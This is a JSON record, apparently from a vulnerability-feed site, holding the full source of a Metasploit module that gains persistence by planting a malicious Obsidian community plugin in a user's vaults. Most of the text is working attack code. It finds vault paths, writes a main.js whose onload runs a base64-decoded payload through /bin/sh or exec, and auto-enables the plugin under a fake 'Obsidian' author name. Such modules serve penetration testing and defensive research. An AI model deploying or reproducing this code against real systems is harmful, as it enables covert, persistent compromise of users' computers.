{“lastseen”:”2025-09-16T19:07:36″,”description”:”This module searches for Obsidian vaults for a user, and uploads a malicious community plugin to the vault. The vaults must be opened with community …”,”published”:”2025-09-16T18:53:38″,”modified”:”2025-09-16T18:53:38″,”type”:”metasploit”,”title”:”Obsidian Plugin Persistence”,”source”:””,”references”:””,”id”:”MSF:EXPLOIT-MULTI-PERSISTENCE-OBSIDIAN_PLUGIN-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nclass MetasploitModule \\u003c Msf::Exploit::Local\\n Rank = ExcellentRanking\\n\\n include Msf::Post::File\\n include Msf::Post::Unix # whoami\\n include Msf::Auxiliary::Report\\n include Msf::Exploit::Local::Persistence\\n include Msf::Exploit::Deprecated\\n moved_from ‘exploits\/multi\/local\/obsidian_plugin_persistence’\\n\\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘Obsidian Plugin Persistence’,\\n ‘Description’ =\\u003e %q{\\n This module searches for Obsidian vaults for a user, and uploads a malicious\\n community plugin to the vault. The vaults must be opened with community\\n plugins enabled (NOT restricted mode), but the plugin will be enabled\\n automatically.\\n\\n Tested against Obsidian 1.7.7 on Kali, Ubuntu 22.04, and Windows 10.\\n },\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘Author’ =\\u003e [\\n ‘h00die’, # Module\\n ‘Thomas Byrne’ # Research, PoC\\n ],\\n ‘DisclosureDate’ =\\u003e ‘2022-09-16’,\\n ‘SessionTypes’ =\\u003e [ ‘shell’, ‘meterpreter’ ],\\n ‘Privileged’ =\\u003e false,\\n ‘References’ =\\u003e [\\n [ ‘URL’, ‘https:\/\/docs.obsidian.md\/Plugins\/Getting+started\/Build+a+plugin’ ],\\n [ ‘URL’, ‘https:\/\/github.com\/obsidianmd\/obsidian-sample-plugin\/tree\/master’ ],\\n [ ‘URL’, ‘https:\/\/forum.obsidian.md\/t\/can-obsidian-plugins-have-malware\/34491’ ],\\n [ ‘URL’, ‘https:\/\/help.obsidian.md\/Extending+Obsidian\/Plugin+security’ ],\\n [ ‘URL’, ‘https:\/\/thomas-byrne.co.uk\/research\/obsidian-malicious-plugins\/obsidian-research\/’ ]\\n ],\\n ‘Arch’ =\\u003e [ARCH_CMD],\\n ‘Platform’ =\\u003e %w[osx linux windows],\\n ‘DefaultOptions’ =\\u003e {\\n ‘PrependMigrate’ =\\u003e true\\n },\\n ‘Payload’ =\\u003e {\\n ‘BadChars’ =\\u003e ‘\\”‘\\n },\\n ‘Targets’ =\\u003e [\\n [‘Auto’, {} ],\\n [‘Linux’, { ‘Platform’ =\\u003e ‘unix’ } ],\\n [‘OSX’, { ‘Platform’ =\\u003e ‘osx’ } ],\\n [‘Windows’, { ‘Platform’ =\\u003e ‘windows’ } ],\\n ],\\n ‘Notes’ =\\u003e {\\n ‘Reliability’ =\\u003e [ REPEATABLE_SESSION ],\\n ‘Stability’ =\\u003e [ CRASH_SAFE ],\\n ‘SideEffects’ =\\u003e [ ARTIFACTS_ON_DISK, CONFIG_CHANGES ]\\n },\\n ‘DefaultTarget’ =\\u003e 0\\n )\\n )\\n\\n register_options([\\n OptString.new(‘NAME’, [ false, ‘Name of the plugin’, ” ]),\\n OptString.new(‘USER’, [ false, ‘User to target, or current user if blank’, ” ]),\\n OptString.new(‘CONFIG’, [ false, ‘Config file location on target’, ” ]),\\n ])\\n deregister_options(‘WritableDir’)\\n end\\n\\n def plugin_name\\n return datastore[‘NAME’] unless datastore[‘NAME’].blank?\\n\\n rand_text_alphanumeric(4..10)\\n end\\n\\n def find_vaults\\n vaults_found = []\\n user = target_user\\n vprint_status(\\”Target User: #{user}\\”)\\n case session.platform\\n when ‘windows’, ‘win’\\n config_files = [\\”C:\\\\\\\\Users\\\\\\\\#{user}\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\obsidian\\\\\\\\obsidian.json\\”]\\n when ‘osx’\\n config_files = [\\”\/User\/#{user}\/Library\/Application Support\/obsidian\/obsidian.json\\”]\\n when ‘linux’\\n config_files = [\\n \\”\/home\/#{user}\/.config\/obsidian\/obsidian.json\\”,\\n \\”\/home\/#{user}\/snap\/obsidian\/40\/.config\/obsidian\/obsidian.json\\”\\n ] # snap package\\n end\\n\\n config_files \\u003c\\u003c datastore[‘CONFIG’] unless datastore[‘CONFIG’].empty?\\n\\n config_files.each do |config_file|\\n next unless file?(config_file)\\n\\n vprint_status(\\”Found user obsidian file: #{config_file}\\”)\\n config_contents = read_file(config_file)\\n return fail_with(Failure::Unknown, ‘Failed to read config file’) if config_contents.nil?\\n\\n begin\\n vaults = JSON.parse(config_contents)\\n rescue JSON::ParserError\\n vprint_error(\\”Failed to parse JSON from #{config_file}\\”)\\n next\\n end\\n\\n vaults_found = vaults[‘vaults’]\\n if vaults_found.nil?\\n vprint_error(\\”No vaults found in #{config_file}\\”)\\n next\\n end\\n\\n vaults[‘vaults’].each do |k, v|\\n if v[‘open’]\\n print_good(\\”Found #{v[‘open’] ? ‘open’ : ‘closed’} vault #{k}: #{v[‘path’]}\\”)\\n else\\n print_status(\\”Found #{v[‘open’] ? ‘open’ : ‘closed’} vault #{k}: #{v[‘path’]}\\”)\\n end\\n end\\n end\\n\\n vaults_found\\n end\\n\\n def manifest_js(plugin_name)\\n JSON.pretty_generate({\\n ‘id’ =\\u003e plugin_name.gsub(‘ ‘, ‘_’),\\n ‘name’ =\\u003e plugin_name,\\n ‘version’ =\\u003e ‘1.0.0’,\\n ‘minAppVersion’ =\\u003e ‘0.15.0’,\\n ‘description’ =\\u003e ”,\\n ‘author’ =\\u003e ‘Obsidian’,\\n ‘authorUrl’ =\\u003e ‘https:\/\/obsidian.md’,\\n ‘isDesktopOnly’ =\\u003e false\\n })\\n end\\n\\n def main_js(_plugin_name)\\n if [‘windows’, ‘win’].include? session.platform\\n payload_stub = payload.encoded.to_s\\n else\\n payload_stub = \\”echo \\\\\\\\\\\\\\”#{Rex::Text.encode_base64(payload.encoded)}\\\\\\\\\\\\\\” | base64 -d | \/bin\/sh\\”\\n end\\n %%\\n\/*\\nTHIS IS A GENERATED\/BUNDLED FILE BY ESBUILD\\nif you want to view the source, please visit the github repository of this plugin\\n*\/\\n\\nvar __defProp = Object.defineProperty;\\nvar __getOwnPropDesc = Object.getOwnPropertyDescriptor;\\nvar __getOwnPropNames = Object.getOwnPropertyNames;\\nvar __hasOwnProp = Object.prototype.hasOwnProperty;\\nvar __export = (target, all) =\\u003e {\\n for (var name in all)\\n __defProp(target, name, { get: all[name], enumerable: true });\\n};\\nvar __copyProps = (to, from, except, desc) =\\u003e {\\n if (from \\u0026\\u0026 typeof from === \\”object\\” || typeof from === \\”function\\”) {\\n for (let key of __getOwnPropNames(from))\\n if (!__hasOwnProp.call(to, key) \\u0026\\u0026 key !== except)\\n __defProp(to, key, { get: () =\\u003e from[key], enumerable: !(desc = __getOwnPropDesc(from, key)) || desc.enumerable });\\n }\\n return to;\\n};\\nvar __toCommonJS = (mod) =\\u003e __copyProps(__defProp({}, \\”__esModule\\”, { value: true }), mod);\\n\\n\/\/ main.ts\\nvar main_exports = {};\\n__export(main_exports, {\\n default: () =\\u003e ExamplePlugin\\n});\\nmodule.exports = __toCommonJS(main_exports);\\nvar import_obsidian = require(\\”obsidian\\”);\\nvar ExamplePlugin = class extends import_obsidian.Plugin {\\n async onload() {\\n var command = \\”#{payload_stub}\\”;\\n const { exec } = require(\\”child_process\\”);\\n exec(command, (error, stdout, stderr) =\\u003e {\\n if (error) {\\n console.log(`error: ${error.message}`);\\n return;\\n }\\n if (stderr) {\\n console.log(`stderr: ${stderr}`);\\n return;\\n }\\n console.log(`stdout: ${stdout}`);\\n });\\n }\\n async onunload() {\\n }\\n};\\n%\\n end\\n\\n def target_user\\n return datastore[‘USER’] unless datastore[‘USER’].blank?\\n\\n return cmd_exec(‘cmd.exe \/c echo %USERNAME%’).strip if [‘windows’, ‘win’].include? session.platform\\n\\n whoami\\n end\\n\\n def check\\n return CheckCode::Appears(‘Vaults found’) unless find_vaults.empty?\\n\\n CheckCode::Safe(‘No vaults found’)\\n end\\n\\n def install_persistence\\n plugin = plugin_name\\n print_status(\\”Using plugin name: #{plugin}\\”)\\n vaults = find_vaults\\n fail_with(Failure::NotFound, ‘No vaults found’) if vaults.empty?\\n vaults.each_value do |vault|\\n print_status(\\”Uploading plugin to vault #{vault[‘path’]}\\”)\\n # avoid mkdir function because that registers it for delete, and we don’t want that for\\n # persistent modules\\n if [‘windows’, ‘win’].include? session.platform\\n cmd_exec(\\”cmd.exe \/c md \\\\\\”#{vault[‘path’]}\\\\\\\\.obsidian\\\\\\\\plugins\\\\\\\\#{plugin}\\\\\\”\\”)\\n else\\n cmd_exec(\\”mkdir -p ‘#{vault[‘path’]}\/.obsidian\/plugins\/#{plugin}\/’\\”)\\n end\\n vprint_status(\\”Uploading: #{vault[‘path’]}\/.obsidian\/plugins\/#{plugin}\/main.js\\”)\\n write_file(\\”#{vault[‘path’]}\/.obsidian\/plugins\/#{plugin}\/main.js\\”, main_js(plugin))\\n @clean_up_rc \\u003c\\u003c \\”rm #{vault[‘path’]}\/.obsidian\/plugins\/#{plugin}\/main.js\\\\n\\”\\n\\n vprint_status(\\”Uploading: #{vault[‘path’]}\/.obsidian\/plugins\/#{plugin}\/manifest.json\\”)\\n write_file(\\”#{vault[‘path’]}\/.obsidian\/plugins\/#{plugin}\/manifest.json\\”, manifest_js(plugin))\\n @clean_up_rc \\u003c\\u003c \\”rm #{vault[‘path’]}\/.obsidian\/plugins\/#{plugin}\/manifest.json\\\\n\\”\\n # read in the enabled community plugins, and add ours to the enabled list\\n if file?(\\”#{vault[‘path’]}\/.obsidian\/community-plugins.json\\”)\\n plugins = read_file(\\”#{vault[‘path’]}\/.obsidian\/community-plugins.json\\”)\\n begin\\n plugins = JSON.parse(plugins)\\n vprint_status(\\”Found #{plugins.length} enabled community plugins (#{plugins.join(‘, ‘)})\\”)\\n path = store_loot(‘obsidian.community.plugins.json’, ‘text\/plain’, session, plugins, nil, nil)\\n print_good(\\”Config file saved in: #{path}\\”)\\n @clean_up_rc \\u003c\\u003c \\”upload #{path} #{vault[‘path’]}\/.obsidian\/community-plugins.json\\\\n\\”\\n rescue JSON::ParserError\\n plugins = []\\n end\\n\\n plugins \\u003c\\u003c plugin unless plugins.include?(plugin)\\n else\\n plugins = [plugin]\\n end\\n vprint_status(\\”adding #{plugin} to the enabled community plugins list\\”)\\n write_file(\\”#{vault[‘path’]}\/.obsidian\/community-plugins.json\\”, JSON.pretty_generate(plugins))\\n print_good(‘Plugin enabled, waiting for Obsidian to open the vault and execute the plugin.’)\\n end\\n end\\nend\\n”,”sourceHref”:”https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/exploits\/multi\/persistence\/obsidian_plugin.rb”,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.rapid7.com\/db\/modules\/exploit\/multi\/persistence\/obsidian_plugin\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-09-16T19:07:36″,”description”:”This module searches for Obsidian vaults for a user, and uploads a malicious community plugin to the vault. The vaults must be opened with community…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,169,13,33,7,11,5],"class_list":["post-17674","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-metasploit","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n